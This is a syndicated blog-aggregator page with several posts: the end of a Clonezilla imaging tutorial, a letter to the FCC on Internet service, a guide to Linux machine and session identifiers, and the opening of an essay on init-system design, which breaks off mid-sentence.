When you select local_dev Clonezilla scans all of your locally-attached storage, including hard disks and USB storage devices, and makes a list of your partitions. Select the one you want to store your new image in, and then it asks which directory to use and shows you a list. Select your desired directory, and the next screen shows all of your mounts and used/available space. Press Enter, and the next screen gives you the option of Beginner or Expert mode. I choose Beginner.

In the next screen you can choose savedisk, which creates an image of an entire hard disk, or save_parts, which allows you to select individual partitions. I want to select partitions.

The next screen asks for a name for your new image. After accepting the default or entering your own name, go to the next screen. Clonezilla scans your partitions and creates a checklist so you can pick the ones you want to copy. After making your selections, the next screen gives you the option to do a filesystem check and repair. I’m impatient, so I skip this part.

The next screen asks if you want Clonezilla to check your newly-created image to make sure it is restorable. I always say yes. Next, it gives you a command-line hint in case you ever want to use the command-line instead of the GUI, and you must press Enter again. You get one more confirmation, and then type y for Yes to make the copy.

You get to watch a nice red, white, and blue progress screen while Clonezilla creates your new image (figure 3).

fig-3 export

When it’s all finished press Enter and then select reboot, and remember to remove your Clonezilla USB stick. Boot up your computer normally, and go look at your nice new Clonezilla image. You should see something like this:

$ ls -l /2014-08-07-11-img/
total 1241448
-rw-r--r-- 1 root root       1223 Aug  7 04:22 blkdev.list
-rw-r--r-- 1 root root        636 Aug  7 04:22 blkid.list
-rw-r--r-- 1 root root       3658 Aug  7 04:24 clonezilla-img
-rw-r--r-- 1 root root      12379 Aug  7 04:24 Info-dmi.txt
-rw-r--r-- 1 root root      22685 Aug  7 04:24 Info-lshw.txt
-rw-r--r-- 1 root root       3652 Aug  7 04:24 Info-lspci.txt
-rw-r--r-- 1 root root        171 Aug  7 04:24 Info-packages.txt
-rw-r--r-- 1 root root         86 Aug  7 04:24 Info-saved-by-cmd.txt
-rw-r--r-- 1 root root          5 Aug  7 04:24 parts
-rw------- 1 root root 1270096769 Aug  7 04:24 sda6.ext4-ptcl-img.gz.aa
-rw-r--r-- 1 root root         37 Aug  7 04:22 sda-chs.sf
-rw-r--r-- 1 root root    1048064 Aug  7 04:22 sda-hidden-data-after-mbr
-rw-r--r-- 1 root root        512 Aug  7 04:22 sda-mbr
-rw-r--r-- 1 root root        750 Aug  7 04:22 sda-pt.parted
-rw-r--r-- 1 root root        625 Aug  7 04:22 sda-pt.parted.compact
-rw-r--r-- 1 root root        514 Aug  7 04:22 sda-pt.sf

Restoring a Clonezilla Image

Restoring your image is similar to creating it. Again, boot up Clonezilla, go through the same initial steps, select dev_image, and then on the local_dev screen select the location of your image that you want to restore, whether it’s on a local device or network share. Then continue through the rest of the screens, making sure that you have the correct restore image and target locations selected.

You can learn more of Clonezilla’s amazing powers at the Clonezilla Live Documentation page.

Bradley M. Kuhn's Blog ( bkuhn ): Be Sure to Comment on FCC’s NPRM 14-28

This post was syndicated from: Bradley M. Kuhn&#039;s Blog ( bkuhn ) and was written by: Bradley M. Kuhn. Original post: at Bradley M. Kuhn's Blog ( bkuhn )

I remind everyone today, particularly USA Citizens, to be sure to comment
on
the FCC’s
Notice of Proposed Rulemaking (NPRM) 14-28
. They even did a sane thing
and provided
an email address you can write to rather than using their poorly designed
web forums
,
but PC
Magazine published relatively complete instructions for other ways
.
The deadline isn’t for a while yet, but it’s worth getting it done so you
don’t forget. Below is my letter in case anyone is interested.

Dear FCC Commissioners,

I am writing in response to NPRM 14-28 — your request for comments regarding
the “Open Internet”.

I am a trained computer scientist and I work in the technology industry.
(I’m a software developer and software freedom activist.) I have subscribed
to home network services since 1989, starting with the Prodigy service, and
switching to Internet service in 1991. Initially, I used a PSTN single-pair
modem and eventually upgraded to DSL in 1999. I still have a DSL line, but
it’s sadly not much faster than the one I had in 1999, and I explain below
why.

In fact, I’ve watched the situation get progressively worse, not better,
since the Telecommunications Act of 1996. While my download speeds are
little bit faster than they were in the late 1990s, I now pay
substantially more for only small increases of upload speeds, even in a
major urban markets. In short, it’s become increasingly more difficult
to actually purchase true Internet connectivity service anywhere in the
USA. But first, let me explain what I mean by “true Internet
connectivity”.

The Internet was created as a peer-to-peer medium where all nodes were
equal. In the original design of the Internet, every device has its own
IP address and, if the user wanted, that device could be addressed
directly and fully by any other device on the Internet. For its part,
the network in between the two nodes were intended to merely move the
packets between those nodes as quickly as possible — treating all those
packets the same way, and analyzing those packets only with publicly
available algorithms that everyone agreed were correct and fair.

Of course, the companies who typically appeal to (or even fight) the FCC
want the true Internet to simply die. They seek to turn the promise of
a truly peer-to-peer network of equality into a traditional broadcast
medium that they control. They frankly want to manipulate the Internet
into a mere television broadcast system (with the only improvement to
that being “more stations”).

Because of this, the three following features of the Internet —
inherent in its design — that are now extremely difficult for
individual home users to purchase at reasonable cost from so-called
“Internet providers” like Time Warner, Verizon, and Comcast:

  • A static IP address, which allows the user to be a true, equal node on
    the Internet. (And, related: IPv6 addresses, which could end the claim
    that static IP addresses are a precious resource.)
  • An unfiltered connection, that allows the user to run their own
    webserver, email server and the like. (Most of these companies block TCP
    ports 80 and 25 at the least, and usually many more ports, too).
  • Reasonable choices between the upload/download speed tradeoff.

For example, in New York, I currently pay nearly $150/month to an
independent ISP just to have a static, unfiltered IP address with 10
Mbps down and 2 Mbps up. I work from home and the 2 Mbps up is
incredibly slow for modern usage. However, I still live in the Slowness
because upload speeds greater than that are extremely price-restrictive
from any provider.

In other words, these carriers have designed their networks to
prioritize all downloading over all uploading, and to purposely place
the user behind many levels of Network Address Translation and network
filtering. In this environment, many Internet applications simply do
not work (or require complex work-arounds that disable key features).
As an example: true diversity in VoIP accessibility and service has
almost entirely been superseded by proprietary single-company services
(such as Skype) because SIP, designed by the IETF (in part) for VoIP
applications, did not fully anticipate that nearly every user would be
behind NAT and unable to use SIP without complex work-arounds.

I believe this disastrous situation centers around problems with the
Telecommunications Act of 1996. While
the
ILECs

are theoretically required to license network infrastructure fairly at bulk
rates to

CLEC
s,
I’ve frequently seen — both professional and personally — wars
waged against
CLECs by
ILECs. CLECs
simply can’t offer their own types of services that merely “use”
the ILECs’ connectivity. The technical restrictions placed by ILECs force
CLECs to offer the same style of service the ILEC offers, and at a higher
price (to cover their additional overhead in dealing with the CLECs)! It’s
no wonder there are hardly any CLECs left.

Indeed, in my 25 year career as a technologist, I’ve seen many nasty
tricks by Verizon here in NYC, such as purposeful work-slowdowns in
resolution of outages and Verizon technicians outright lying to me and
to CLEC technicians about the state of their network. For my part, I
stick with one of the last independent ISPs in NYC, but I suspect they
won’t be able to keep their business going for long. Verizon either (a)
buys up any CLEC that looks too powerful, or, (b) if Verizon can’t buy
them, Verizon slowly squeezes them out of business with dirty tricks.

The end result is that we don’t have real options for true Internet
connectivity for home nor on-site business use. I’m already priced
out of getting a 10 Mbps upload with a static IP and all ports usable.
I suspect within 5 years, I’ll be priced out of my current 2 Mbps upload
with a static IP and all ports usable.

I realize the problems that most users are concerned about on this issue
relate to their ability to download bytes from third-party companies
like Netflix. Therefore, it’s all too easy for Verizon to play out this
argument as if it’s big companies vs. big companies.

However, the real fallout from the current system is that the cost for
personal Internet connectivity that allows individuals equal existence
on the network is so high that few bother. The consequence, thus, is
that only those who are heavily involved in the technology industry even
know what types of applications would be available if everyone had a
static IP with all ports usable and equal upload and download speeds
of 10 Mbs or higher.

Yet, that’s the exact promise of network connectivity that I was taught
about as an undergraduate in Computer Science in the early 1990s. What
I see today is the dystopian version of the promise. My generation of
computer scientists have been forced to constrain their designs of
Internet-enabled applications to fit a model that the network carriers
dictate.

I realize you can’t possibly fix all these social ills in the network
connectivity industry with one rule-making, but I hope my comments have
perhaps given a slightly different perspective of what you’ll hear from
most of the other commenters on this issue. I thank you for reading my
comments and would be delighted to talk further with any of your staff
about these issues at your convenience.

Sincerely,

Bradley M. Kuhn,
a citizen of the USA since birth, currently living in New York, NY.

Pid Eins: On IDs

This post was syndicated from: Pid Eins and was written by: Lennart Poettering. Original post: at Pid Eins

When programming software that cooperates with software running on behalf of
other users, other sessions or other computers it is often necessary to work with
unique identifiers. These can be bound to various hardware and software objects
as well as lifetimes. Often, when people look for such an ID to use they pick
the wrong one because semantics and lifetime or the IDs are not clear. Here’s a
little incomprehensive list of IDs accessible on Linux and how you should or
should not use them.

Hardware IDs

  1. /sys/class/dmi/id/product_uuid: The main board product UUID, as
    set by the board manufacturer and encoded in the BIOS DMI information. It may
    be used to identify a mainboard and only the mainboard. It changes when the
    user replaces the main board. Also, often enough BIOS manufacturers write bogus
    serials into it. In addition, it is x86-specific. Access for unprivileged users
    is forbidden. Hence it is of little general use.
  2. CPUID/EAX=3 CPU serial number: A CPU UUID, as set by the
    CPU manufacturer and encoded on the CPU chip. It may be used to identify a CPU
    and only a CPU. It changes when the user replaces the CPU. Also, most modern
    CPUs don’t implement this feature anymore, and older computers tend to disable
    this option by default, controllable via a BIOS Setup option. In addition, it
    is x86-specific. Hence this too is of little general use.
  3. /sys/class/net/*/address: One or more network MAC addresses, as
    set by the network adapter manufacturer and encoded on some network card
    EEPROM. It changes when the user replaces the network card. Since network cards
    are optional and there may be more than one the availability if this ID is not
    guaranteed and you might have more than one to choose from. On virtual machines
    the MAC addresses tend to be random. This too is hence of little general use.
  4. /sys/bus/usb/devices/*/serial: Serial numbers of various USB
    devices, as encoded in the USB device EEPROM. Most devices don’t have a serial
    number set, and if they have it is often bogus. If the user replaces his USB
    hardware or plugs it into another machine these IDs may change or appear in
    other machines. This hence too is of little use.

There are various other hardware IDs available, many of which you may
discover via the ID_SERIAL udev property of various devices, such hard disks
and similar. They all have in common that they are bound to specific
(replacable) hardware, not universally available, often filled with bogus data
and random in virtualized environments. Or in other words: don’t use them, don’t
rely on them for identification, unless you really know what you are doing and
in general they do not guarantee what you might hope they guarantee.

Software IDs

  1. /proc/sys/kernel/random/boot_id: A random ID that is regenerated
    on each boot. As such it can be used to identify the local machine’s current
    boot. It’s universally available on any recent Linux kernel. It’s a good and
    safe choice if you need to identify a specific boot on a specific booted
    kernel.
  2. gethostname(), /proc/sys/kernel/hostname: A non-random ID
    configured by the administrator to identify a machine in the network. Often
    this is not set at all or is set to some default value such as
    localhost and not even unique in the local network. In addition it
    might change during runtime, for example because it changes based on updated
    DHCP information. As such it is almost entirely useless for anything but
    presentation to the user. It has very weak semantics and relies on correct
    configuration by the administrator. Don’t use this to identify machines in a
    distributed environment. It won’t work unless centrally administered, which
    makes it useless in a globalized, mobile world. It has no place in
    automatically generated filenames that shall be bound to specific hosts. Just
    don’t use it, please. It’s really not what many people think it is.
    gethostname() is standardized in POSIX and hence portable to other
    Unixes.
  3. IP Addresses returned by SIOCGIFCONF or the respective Netlink APIs: These
    tend to be dynamically assigned and often enough only valid on local networks
    or even only the local links (i.e. 192.168.x.x style addresses, or even
    169.254.x.x/IPv4LL). Unfortunately they hence have little use outside of
    networking.
  4. gethostid(): Returns a supposedly unique 32-bit identifier for the
    current machine. The semantics of this is not clear. On most machines this
    simply returns a value based on a local IPv4 address. On others it is
    administrator controlled via the /etc/hostid file. Since the semantics
    of this ID are not clear and most often is just a value based on the IP address it is
    almost always the wrong choice to use. On top of that 32bit are not
    particularly a lot. On the other hand this is standardized in POSIX and hence
    portable to other Unixes. It’s probably best to ignore this value and if people
    don’t want to ignore it they should probably symlink /etc/hostid to
    /var/lib/dbus/machine-id or something similar.
  5. /var/lib/dbus/machine-id: An ID identifying a specific Linux/Unix
    installation. It does not change if hardware is replaced. It is not unreliable
    in virtualized environments. This value has clear semantics and is considered
    part of the D-Bus API. It is supposedly globally unique and portable to all
    systems that have D-Bus. On Linux, it is universally available, given that
    almost all non-embedded and even a fair share of the embedded machines ship
    D-Bus now. This is the recommended way to identify a machine, possibly with a
    fallback to the host name to cover systems that still lack D-Bus. If your
    application links against libdbus, you may access this ID with
    dbus_get_local_machine_id(), if not you can read it directly from the file system.
  6. /proc/self/sessionid: An ID identifying a specific Linux login
    session. This ID is maintained by the kernel and part of the auditing logic. It
    is uniquely assigned to each login session during a specific system boot,
    shared by each process of a session, even across su/sudo and cannot be changed
    by userspace. Unfortunately some distributions have so far failed to set things
    up properly for this to work (Hey, you, Ubuntu!), and this ID is always
    (uint32_t) -1 for them. But there’s hope they get this fixed
    eventually. Nonetheless it is a good choice for a unique session identifier on
    the local machine and for the current boot. To make this ID globally unique it
    is best combined with /proc/sys/kernel/random/boot_id.
  7. getuid(): An ID identifying a specific Unix/Linux user. This ID is
    usually automatically assigned when a user is created. It is not unique across
    machines and may be reassigned to a different user if the original user was
    deleted. As such it should be used only locally and with the limited validity
    in time in mind. To make this ID globally unique it is not sufficient to
    combine it with /var/lib/dbus/machine-id, because the same ID might be
    used for a different user that is created later with the same UID. Nonetheless
    this combination is often good enough. It is available on all POSIX systems.
  8. ID_FS_UUID: an ID that identifies a specific file system in the
    udev tree. It is not always clear how these serials are generated but this
    tends to be available on almost all modern disk file systems. It is not
    available for NFS mounts or virtual file systems. Nonetheless this is often a
    good way to identify a file system, and in the case of the root directory even
    an installation. However due to the weakly defined generation semantics the
    D-Bus machine ID is generally preferrable.

Generating IDs

Linux offers a kernel interface to generate UUIDs on demand, by reading from
/proc/sys/kernel/random/uuid. This is a very simple interface to
generate UUIDs. That said, the logic behind UUIDs is unnecessarily complex and
often it is a better choice to simply read 16 bytes or so from
/dev/urandom.

Summary

And the gist of it all: Use /var/lib/dbus/machine-id! Use
/proc/self/sessionid! Use /proc/sys/kernel/random/boot_id!
Use getuid()! Use /dev/urandom!
And forget about the
rest, in particular the host name, or the hardware IDs such as DMI. And keep in
mind that you may combine the aforementioned IDs in various ways to get
different semantics and validity constraints.

Pid Eins: Rethinking PID 1

This post was syndicated from: Pid Eins and was written by: Lennart Poettering. Original post: at Pid Eins

If you are well connected or good at reading between the lines
you might already know what this blog post is about. But even then
you may find this story interesting. So grab a cup of coffee,
sit down, and read what’s coming.

This blog story is long, so even though I can only recommend
reading the long story, here’s the one sentence summary: we are
experimenting with a new init system and it is fun.

Here’s the code. And here’s the story:

Process Identifier 1

On every Unix system there is one process with the special
process identifier 1. It is started by the kernel before all other
processes and is the parent process for all those other processes
that have nobody else to be child of. Due to that it can do a lot
of stuff that other processes cannot do. And it is also
responsible for some things that other processes are not
responsible for, such as bringing up and maintaining userspace
during boot.

Historically on Linux the software acting as PID 1 was the
venerable sysvinit package, though it had been showing its age for
quite a while. Many replacements have been suggested, only one of
them really took off: Upstart, which has by now found
its way into all major distributions.

As mentioned, the central responsibility of an init system is
to bring up userspace. And a good init system does that
fast. Unfortunately, the traditional SysV init system was not
particularly fast.

For a fast and efficient boot-up two things are crucial:

  • To start less.
  • And to start more in parallel.

What does that mean? Starting less means starting fewer
services or deferring the starting of services until they are
actually needed. There are some services where we know that they
will be required sooner or later (syslog, D-Bus system bus, etc.),
but for many others this isn’t the case. For example, bluetoothd
does not need to be running unless a bluetooth dongle is actually
plugged in or an application wants to talk to its D-Bus
interfaces. Same for a printing system: unless the machine
physically is connected to a printer, or an application wants to
print something, there is no need to run a printing daemon such as
CUPS. Avahi: if the machine is not connected to a
network, there is no need to run Avahi, unless some application wants
to use its APIs. And even SSH: as long as nobody wants to contact
your machine there is no need to run it, as long as it is then
started on the first connection. (And admit it, on most machines
where sshd might be listening somebody connects to it only every
other month or so.)

Starting more in parallel means that if we have
to run something, we should not serialize its start-up (as sysvinit
does), but run it all at the same time, so that the available
CPU and disk IO bandwidth is maxed out, and hence
the overall start-up time minimized.

Hardware and Software Change Dynamically

Modern systems (especially general purpose OS) are highly
dynamic in their configuration and use: they are mobile, different
applications are started and stopped, different hardware added and
removed again. An init system that is responsible for maintaining
services needs to listen to hardware and software
changes. It needs to dynamically start (and sometimes stop)
services as they are needed to run a program or enable some
hardware.

Most current systems that try to parallelize boot-up still
synchronize the start-up of the various daemons involved: since
Avahi needs D-Bus, D-Bus is started first, and only when D-Bus
signals that it is ready, Avahi is started too. Similar for other
services: livirtd and X11 need HAL (well, I am considering the
Fedora 13 services here, ignore that HAL is obsolete), hence HAL
is started first, before livirtd and X11 are started. And
libvirtd also needs Avahi, so it waits for Avahi too. And all of
them require syslog, so they all wait until Syslog is fully
started up and initialized. And so on.

Parallelizing Socket Services

This kind of start-up synchronization results in the
serialization of a significant part of the boot process. Wouldn’t
it be great if we could get rid of the synchronization and
serialization cost? Well, we can, actually. For that, we need to
understand what exactly the daemons require from each other, and
why their start-up is delayed. For traditional Unix daemons,
there’s one answer to it: they wait until the socket the other
daemon offers its services on is ready for connections. Usually
that is an AF_UNIX socket in the file-system, but it could be
AF_INET[6], too. For example, clients of D-Bus wait that
/var/run/dbus/system_bus_socket can be connected to,
clients of syslog wait for /dev/log, clients of CUPS wait
for /var/run/cups/cups.sock and NFS mounts wait for
/var/run/rpcbind.sock and the portmapper IP port, and so
on. And think about it, this is actually the only thing they wait
for!

Now, if that’s all they are waiting for, if we manage to make
those sockets available for connection earlier and only actually
wait for that instead of the full daemon start-up, then we can
speed up the entire boot and start more processes in parallel. So,
how can we do that? Actually quite easily in Unix-like systems: we
can create the listening sockets before we actually start
the daemon, and then just pass the socket during exec()
to it. That way, we can create all sockets for all
daemons in one step in the init system, and then in a second step
run all daemons at once. If a service needs another, and it is not
fully started up, that’s completely OK: what will happen is that
the connection is queued in the providing service and the client
will potentially block on that single request. But only that one
client will block and only on that one request. Also, dependencies
between services will no longer necessarily have to be configured
to allow proper parallelized start-up: if we start all sockets at
once and a service needs another it can be sure that it can
connect to its socket.

Because this is at the core of what is following, let me say
this again, with different words and by example: if you start
syslog and and various syslog clients at the same time, what will
happen in the scheme pointed out above is that the messages of the
clients will be added to the /dev/log socket buffer. As
long as that buffer doesn’t run full, the clients will not have to
wait in any way and can immediately proceed with their start-up. As
soon as syslog itself finished start-up, it will dequeue all
messages and process them. Another example: we start D-Bus and
several clients at the same time. If a synchronous bus
request is sent and hence a reply expected, what will happen is
that the client will have to block, however only that one client
and only until D-Bus managed to catch up and process it.

Basically, the kernel socket buffers help us to maximize
parallelization, and the ordering and synchronization is done by
the kernel, without any further management from userspace! And if
all the sockets are available before the daemons actually start-up,
dependency management also becomes redundant (or at least
secondary): if a daemon needs another daemon, it will just connect
to it. If the other daemon is already started, this will
immediately succeed. If it isn’t started but in the process of
being started, the first daemon will not even have to wait for it,
unless it issues a synchronous request. And even if the other
daemon is not running at all, it can be auto-spawned. From the
first daemon’s perspective there is no difference, hence dependency
management becomes mostly unnecessary or at least secondary, and
all of this in optimal parallelization and optionally with
on-demand loading. On top of this, this is also more robust, because
the sockets stay available regardless whether the actual daemons
might temporarily become unavailable (maybe due to crashing). In
fact, you can easily write a daemon with this that can run, and
exit (or crash), and run again and exit again (and so on), and all
of that without the clients noticing or loosing any request.

It’s a good time for a pause, go and refill your coffee mug,
and be assured, there is more interesting stuff following.

But first, let’s clear a few things up: is this kind of logic
new? No, it certainly is not. The most prominent system that works
like this is Apple’s launchd system: on MacOS the listening of the
sockets is pulled out of all daemons and done by launchd. The
services themselves hence can all start up in parallel and
dependencies need not to be configured for them. And that is
actually a really ingenious design, and the primary reason why
MacOS manages to provide the fantastic boot-up times it
provides. I can highly recommend this
video
where the launchd folks explain what they are
doing. Unfortunately this idea never really took on outside of the Apple
camp.

The idea is actually even older than launchd. Prior to launchd
the venerable inetd worked much like this: sockets were
centrally created in a daemon that would start the actual service
daemons passing the socket file descriptors during
exec(). However the focus of inetd certainly
wasn’t local services, but Internet services (although later
reimplementations supported AF_UNIX sockets, too). It also wasn’t a
tool to parallelize boot-up or even useful for getting implicit
dependencies right.

For TCP sockets inetd was primarily used in a way that
for every incoming connection a new daemon instance was
spawned. That meant that for each connection a new
process was spawned and initialized, which is not a
recipe for high-performance servers. However, right from the
beginning inetd also supported another mode, where a
single daemon was spawned on the first connection, and that single
instance would then go on and also accept the follow-up connections
(that’s what the wait/nowait option in
inetd.conf was for, a particularly badly documented
option, unfortunately.) Per-connection daemon starts probably gave
inetd its bad reputation for being slow. But that’s not entirely
fair.

Parallelizing Bus Services

Modern daemons on Linux tend to provide services via D-Bus
instead of plain AF_UNIX sockets. Now, the question is, for those
services, can we apply the same parallelizing boot logic as for
traditional socket services? Yes, we can, D-Bus already has all
the right hooks for it: using bus activation a service can be
started the first time it is accessed. Bus activation also gives
us the minimal per-request synchronisation we need for starting up
the providers and the consumers of D-Bus services at the same
time: if we want to start Avahi at the same time as CUPS (side
note: CUPS uses Avahi to browse for mDNS/DNS-SD printers), then we
can simply run them at the same time, and if CUPS is quicker than
Avahi via the bus activation logic we can get D-Bus to queue the
request until Avahi manages to establish its service name.

So, in summary: the socket-based service activation and the
bus-based service activation together enable us to start
all daemons in parallel, without any further
synchronization. Activation also allows us to do lazy-loading of
services: if a service is rarely used, we can just load it the
first time somebody accesses the socket or bus name, instead of
starting it during boot.

And if that’s not great, then I don’t know what is
great!

Parallelizing File System Jobs

If you look at
the serialization graphs of the boot process
of current
distributions, there are more synchronisation points than just
daemon start-ups: most prominently there are file-system related
jobs: mounting, fscking, quota. Right now, on boot-up a lot of
time is spent idling to wait until all devices that are listed in
/etc/fstab show up in the device tree and are then
fsck’ed, mounted, quota checked (if enabled). Only after that is
fully finished we go on and boot the actual services.

Can we improve this? It turns out we can. Harald Hoyer came up
with the idea of using the venerable autofs system for this:

Just like a connect() call shows that a service is
interested in another service, an open() (or a similar
call) shows that a service is interested in a specific file or
file-system. So, in order to improve how much we can parallelize
we can make those apps wait only if a file-system they are looking
for is not yet mounted and readily available: we set up an autofs
mount point, and then when our file-system finished fsck and quota
due to normal boot-up we replace it by the real mount. While the
file-system is not ready yet, the access will be queued by the
kernel and the accessing process will block, but only that one
daemon and only that one access. And this way we can begin
starting our daemons even before all file systems have been fully
made available — without them missing any files, and maximizing
parallelization.

Parallelizing file system jobs and service jobs does
not make sense for /, after all that’s where the service
binaries are usually stored. However, for file-systems such as
/home, that usually are bigger, even encrypted, possibly
remote and seldom accessed by the usual boot-up daemons, this
can improve boot time considerably. It is probably not necessary
to mention this, but virtual file systems, such as
procfs or sysfs should never be mounted via autofs.

I wouldn’t be surprised if some readers might find integrating
autofs in an init system a bit fragile and even weird, and maybe
more on the “crackish” side of things. However, having played
around with this extensively I can tell you that this actually
feels quite right. Using autofs here simply means that we can
create a mount point without having to provide the backing file
system right-away. In effect it hence only delays accesses. If an
application tries to access an autofs file-system and we take very
long to replace it with the real file-system, it will hang in an
interruptible sleep, meaning that you can safely cancel it, for
example via C-c. Also note that at any point, if the mount point
should not be mountable in the end (maybe because fsck failed), we
can just tell autofs to return a clean error code (like
ENOENT). So, I guess what I want to say is that even though
integrating autofs into an init system might appear adventurous at
first, our experimental code has shown that this idea works
surprisingly well in practice — if it is done for the right
reasons and the right way.

Also note that these should be direct autofs
mounts, meaning that from an application perspective there’s
little effective difference between a classic mount point and one
based on autofs.

Keeping the First User PID Small

Another thing we can learn from the MacOS boot-up logic is
that shell scripts are evil. Shell is fast and shell is slow. It
is fast to hack, but slow in execution. The classic sysvinit boot
logic is modelled around shell scripts. Whether it is
/bin/bash or any other shell (that was written to make
shell scripts faster), in the end the approach is doomed to be
slow. On my system the scripts in /etc/init.d call
grep at least 77 times. awk is called 92
times, cut 23 and sed 74. Every time those
commands (and others) are called, a process is spawned, the
libraries searched, some start-up stuff like i18n and so on set up
and more. And then after seldom doing more than a trivial string
operation the process is terminated again. Of course, that has to
be incredibly slow. No other language but shell would do something like
that. On top of that, shell scripts are also very fragile, and
change their behaviour drastically based on environment variables
and suchlike, stuff that is hard to oversee and control.

So, let’s get rid of shell scripts in the boot process! Before
we can do that we need to figure out what they are currently
actually used for: well, the big picture is that most of the time,
what they do is actually quite boring. Most of the scripting is
spent on trivial setup and tear-down of services, and should be
rewritten in C, either in separate executables, or moved into the
daemons themselves, or simply be done in the init system.

It is not likely that we can get rid of shell scripts during
system boot-up entirely anytime soon. Rewriting them in C takes
time, in a few case does not really make sense, and sometimes
shell scripts are just too handy to do without. But we can
certainly make them less prominent.

A good metric for measuring shell script infestation of the
boot process is the PID number of the first process you can start
after the system is fully booted up. Boot up, log in, open a
terminal, and type echo $$. Try that on your Linux
system, and then compare the result with MacOS! (Hint, it’s
something like this: Linux PID 1823; MacOS PID 154, measured on
test systems we own.)

Keeping Track of Processes

A central part of a system that starts up and maintains
services should be process babysitting: it should watch
services. Restart them if they shut down. If they crash it should
collect information about them, and keep it around for the
administrator, and cross-link that information with what is
available from crash dump systems such as abrt, and in logging
systems like syslog or the audit system.

It should also be capable of shutting down a service
completely. That might sound easy, but is harder than you
think. Traditionally on Unix a process that does double-forking
can escape the supervision of its parent, and the old parent will
not learn about the relation of the new process to the one it
actually started. An example: currently, a misbehaving CGI script
that has double-forked is not terminated when you shut down
Apache. Furthermore, you will not even be able to figure out its
relation to Apache, unless you know it by name and purpose.

So, how can we keep track of processes, so that they cannot
escape the babysitter, and that we can control them as one unit
even if they fork a gazillion times?

Different people came up with different solutions for this. I
am not going into much detail here, but let’s at least say that
approaches based on ptrace or the netlink connector (a kernel
interface which allows you to get a netlink message each time any
process on the system fork()s or exit()s) that some people have
investigated and implemented, have been criticised as ugly and not
very scalable.

So what can we do about this? Well, since quite a while the
kernel knows Control
Groups
(aka “cgroups”). Basically they allow the creation of a
hierarchy of groups of processes. The hierarchy is directly
exposed in a virtual file-system, and hence easily accessible. The
group names are basically directory names in that file-system. If
a process belonging to a specific cgroup fork()s, its child will
become a member of the same group. Unless it is privileged and has
access to the cgroup file system it cannot escape its
group. Originally, cgroups have been introduced into the kernel
for the purpose of containers: certain kernel subsystems can
enforce limits on resources of certain groups, such as limiting
CPU or memory usage. Traditional resource limits (as implemented
by setrlimit()) are (mostly) per-process. cgroups on the
other hand let you enforce limits on entire groups of
processes. cgroups are also useful to enforce limits outside of
the immediate container use case. You can use it for example to
limit the total amount of memory or CPU Apache and all its
children may use. Then, a misbehaving CGI script can no longer
escape your setrlimit() resource control by simply
forking away.

In addition to container and resource limit enforcement cgroups
are very useful to keep track of daemons: cgroup membership is
securely inherited by child processes, they cannot escape. There’s
a notification system available so that a supervisor process can
be notified when a cgroup runs empty. You can find the cgroups of
a process by reading /proc/$PID/cgroup. cgroups hence
make a very good choice to keep track of processes for babysitting
purposes.

Controlling the Process Execution Environment

A good babysitter should not only oversee and control when a
daemon starts, ends or crashes, but also set up a good, minimal,
and secure working environment for it.

That means setting obvious process parameters such as the
setrlimit() resource limits, user/group IDs or the
environment block, but does not end there. The Linux kernel gives
users and administrators a lot of control over processes (some of
it is rarely used, currently). For each process you can set CPU
and IO scheduler controls, the capability bounding set, CPU
affinity or of course cgroup environments with additional limits,
and more.

As an example, ioprio_set() with
IOPRIO_CLASS_IDLE is a great away to minimize the effect
of locate‘s updatedb on system interactivity.

On top of that certain high-level controls can be very useful,
such as setting up read-only file system overlays based on
read-only bind mounts. That way one can run certain daemons so
that all (or some) file systems appear read-only to them, so that
EROFS is returned on every write request. As such this can be used
to lock down what daemons can do similar in fashion to a poor
man’s SELinux policy system (but this certainly doesn’t replace
SELinux, don’t get any bad ideas, please).

Finally logging is an important part of executing services:
ideally every bit of output a service generates should be logged
away. An init system should hence provide logging to daemons it
spawns right from the beginning, and connect stdout and stderr to
syslog or in some cases even /dev/kmsg which in many
cases makes a very useful replacement for syslog (embedded folks,
listen up!), especially in times where the kernel log buffer is
configured ridiculously large out-of-the-box.

On Upstart

To begin with, let me emphasize that I actually like the code
of Upstart, it is very well commented and easy to
follow. It’s certainly something other projects should learn
from (including my own).

That being said, I can’t say I agree with the general approach
of Upstart. But first, a bit more about the project:

Upstart does not share code with sysvinit, and its
functionality is a super-set of it, and provides compatibility to
some degree with the well known SysV init scripts. It’s main
feature is its event-based approach: starting and stopping of
processes is bound to “events” happening in the system, where an
“event” can be a lot of different things, such as: a network
interfaces becomes available or some other software has been
started.

Upstart does service serialization via these events: if the
syslog-started event is triggered this is used as an
indication to start D-Bus since it can now make use of Syslog. And
then, when dbus-started is triggered,
NetworkManager is started, since it may now use
D-Bus, and so on.

One could say that this way the actual logical dependency tree
that exists and is understood by the admin or developer is
translated and encoded into event and action rules: every logical
“a needs b” rule that the administrator/developer is aware of
becomes a “start a when b is started” plus “stop a when b is
stopped”. In some way this certainly is a simplification:
especially for the code in Upstart itself. However I would argue
that this simplification is actually detrimental. First of all,
the logical dependency system does not go away, the person who is
writing Upstart files must now translate the dependencies manually
into these event/action rules (actually, two rules for each
dependency). So, instead of letting the computer figure out what
to do based on the dependencies, the user has to manually
translate the dependencies into simple event/action rules. Also,
because the dependency information has never been encoded it is
not available at runtime, effectively meaning that an
administrator who tries to figure our why something
happened, i.e. why a is started when b is started, has no chance
of finding that out.

Furthermore, the event logic turns around all dependencies,
from the feet onto their head. Instead of minimizing the
amount of work (which is something that a good init system should
focus on, as pointed out in the beginning of this blog story), it
actually maximizes the amount of work to do during
operations. Or in other words, instead of having a clear goal and
only doing the things it really needs to do to reach the goal, it
does one step, and then after finishing it, it does all
steps that possibly could follow it.

Or to put it simpler: the fact that the user just started D-Bus
is in no way an indication that NetworkManager should be started
too (but this is what Upstart would do). It’s right the other way
round: when the user asks for NetworkManager, that is definitely
an indication that D-Bus should be started too (which is certainly
what most users would expect, right?).

A good init system should start only what is needed, and that
on-demand. Either lazily or parallelized and in advance. However
it should not start more than necessary, particularly not
everything installed that could use that service.

Finally, I fail to see the actual usefulness of the event
logic. It appears to me that most events that are exposed in
Upstart actually are not punctual in nature, but have duration: a
service starts, is running, and stops. A device is plugged in, is
available, and is plugged out again. A mount point is in the
process of being mounted, is fully mounted, or is being
unmounted. A power plug is plugged in, the system runs on AC, and
the power plug is pulled. Only a minority of the events an init
system or process supervisor should handle are actually punctual,
most of them are tuples of start, condition, and stop. This
information is again not available in Upstart, because it focuses
in singular events, and ignores durable dependencies.

Now, I am aware that some of the issues I pointed out above are
in some way mitigated by certain more recent changes in Upstart,
particularly condition based syntaxes such as start on
(local-filesystems and net-device-up IFACE=lo)
in Upstart
